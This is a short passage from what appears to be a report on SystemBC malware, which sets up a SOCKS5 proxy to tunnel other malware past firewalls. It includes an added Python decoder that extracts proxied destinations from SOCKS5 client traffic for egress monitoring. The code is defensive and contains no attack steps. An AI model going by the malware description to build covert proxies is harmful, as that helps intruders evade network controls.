According to researchers, the malware's main job is to set up a SOCKS5 proxy server so that other malware can be pushed through it to “bypass the local firewalls” and “internet content filters”.
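To see what a SOCKS5 proxy like the one SystemBC installs actually carries, here is a decoder for the client-side greeting and request (RFC 1928) that a network monitor can use to pull the real destination out of traffic that would otherwise look like an opaque tunnel; this is an added example, not code from the article or from any SystemBC analysis, and the sample bytes are constructed (assuming the "no authentication" method was negotiated).

```python
import ipaddress
import struct
from typing import Dict, Optional

# SOCKS5 wire constants from RFC 1928
SOCKS_VERSION = 5
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
CMD_NAMES = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}


def parse_greeting(data: bytes) -> Optional[int]:
    """Client greeting: VER NMETHODS METHODS... Returns bytes consumed, or None."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        return None
    nmethods = data[1]
    return 2 + nmethods if len(data) >= 2 + nmethods else None


def parse_request(data: bytes) -> Optional[Dict[str, object]]:
    """Client request: VER CMD RSV ATYP DST.ADDR DST.PORT. Returns the decoded target."""
    if len(data) < 4 or data[0] != SOCKS_VERSION or data[2] != 0:
        return None
    cmd, atyp = data[1], data[3]
    if atyp == ATYP_IPV4 and len(data) >= 8:
        host, off = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == ATYP_DOMAIN and len(data) >= 5 and len(data) >= 5 + data[4]:
        host, off = data[5:5 + data[4]].decode("ascii", "replace"), 5 + data[4]
    elif atyp == ATYP_IPV6 and len(data) >= 20:
        host, off = str(ipaddress.IPv6Address(data[4:20])), 20
    else:
        return None  # unknown address type or truncated packet
    if len(data) < off + 2:
        return None
    port = struct.unpack("!H", data[off:off + 2])[0]
    return {"cmd": CMD_NAMES.get(cmd, f"0x{cmd:02x}"), "host": host, "port": port}


def decode_client_stream(stream: bytes) -> Optional[Dict[str, object]]:
    """Greeting immediately followed by the request (valid only for the no-auth method)."""
    used = parse_greeting(stream)
    return None if used is None else parse_request(stream[used:])


# Constructed sample: greeting offering only "no auth", then CONNECT example.com:443
SAMPLE_CLIENT_BYTES = (
    bytes([0x05, 0x01, 0x00])
    + bytes([0x05, 0x01, 0x00, ATYP_DOMAIN, 11]) + b"example.com" + struct.pack("!H", 443)
)

if __name__ == "__main__":
    print(decode_client_stream(SAMPLE_CLIENT_BYTES))
```

A decoded CONNECT whose host or port is not something the proxying machine should ever reach is the signal a content filter or egress monitor can act on, which is exactly what the proxy is meant to hide.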

Researchers strongly advise users to patch their systems and avoid older systems running plugins vulnerable to attack, as this malware is quite difficult to detect.